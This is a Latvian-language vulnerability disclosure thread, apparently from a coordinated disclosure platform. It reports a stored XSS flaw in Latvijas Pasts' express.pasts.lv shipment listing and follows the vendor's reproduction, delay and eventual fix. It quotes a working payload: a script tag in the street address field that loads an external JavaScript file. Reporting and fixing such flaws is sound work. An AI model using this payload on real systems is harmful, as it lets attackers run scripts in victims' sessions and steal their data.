Express.pasts.lv sadaļa "Mani sūtījumi" izvada sūtītāja vārdu un adresi, neveicot HTML kodēšanu. Tādējādi, ja adresē vai vārdā ir simboli, kam ir nozīme HTML valodā, tie tiek uztverti kā dokumenta daļa un izpildīti.
Sistēmā EKIS reģistrējot sūtījumu, laukā "Iela" norādīju šādu vērtību: K. Valdemāra <script src='https://naivist.net/s.js'></script> iela 2A.
Būtu sagaidāms, ka sadaļā "Mani sūtījumi", atlasot attiecīgās dienas sūtījumus, parādītos ar HTML entītijām kodēta vērtība <script src=..., taču kodēšana netiek veikta. Rezultātā no vietnes https://naivist.net/s.js tiek ielādēts uzbrucēja sagatavots skripts (PoC scenārijā vienkārši izvadu vārdu "test") kas var gan veikt izmaiņas EKIS sistēmas datos, gan nosūtīt EKIS reģistrētos lietotāja datus uzbrucējam.
Šo pašu savulaik bija iespējams atkārtot arī caur API, pašlaik netiku pārbaudījis.
Sveiks, paldies par pieteikumu! Cenšos atdarināt XSS ievainojamību. Kad Tu reģistrējies, vai Tev bija līdzīgs kļūdas paziņojums?!
Ievainojamības ziņojuma statuss tika nomainīts no Jauns uz Atvērts. Izmaiņas veica edv1n5
Sveiki!
Šķiet, ka express.pasts.lv ir pieejams tikai Latvijas Pasta klientiem, kam ir līgums par šīs sistēmas izmantošanu, tāpēc "no malas" piereģistrēties varētu neizdoties. E-veikali pārsvarā sūtījumus pirkumu piegādēm piereģistrē caur API, bet pēc tam klientu portālā var veikt labojumus datos, izdrukāt iepakojuma uzlīmes, u.c.
Atveidoju ievainojamību, tur vairākos lauciņos varēja sasniegt XSS. Nodots izstrādātājiem. Paldies par darbu!
@edv1n5
Labdien.
Lūdzu painformējiet par ievainojamības novēršanas gaitu.
Paldies!
CERT.LV
Labdien,
Šis ir apzināts biznesa risks, tādēļ uz šo ievainojamības labošanu šobrīd netiek atvēlēti resursi.
Cieņā,
Edvīns
@Pasts
Lūdzu painformējiet par ievainojamības novēršanas gaitu.
Sveika, Sanita!
Ievainojamības labošanai resursi ir atrasti un tā šobrīd tiek labota.
@edv1n5
Labdien.
Lūdzu painformējiet par ievainojamības novēršanas gaitu.
Paldies!
@Pasts, lūdzu painformējiet par ievainojamības novēršanas gaitu.
@Sanita Aktualizēju pieteikumu mūsu pusē.
Sveiki!
17.08 plānots ieviest labojumus, informēšu kad tiks ieviesti. Pēc labojumiem @krissr vai varēsiet lūdzu veikt pārbaudi arī no savas puses ?
Dodiet ziņu, kad labojums uzlikts, noteikti varam atkārtot to pašu testa scenāriju.
@krissr Ir ieviests produkcijā, lūgums notestēt.
Aprakstīto scenāriju vairs neizdodas atkārtot, HTML injekcija ir novērsta.
Ievainojamības ziņojuma statuss tika nomainīts no Atvērts uz Atrisināts. Izmaiņas veica lauriskam
Lūdzu izvērtēt ziņojuma publiskošanu!
Lūdzu izvērtēt ziņojuma publiskošanu!
@krissr Paldies par iesaisti!
Ievainojamības ziņojums publiskots!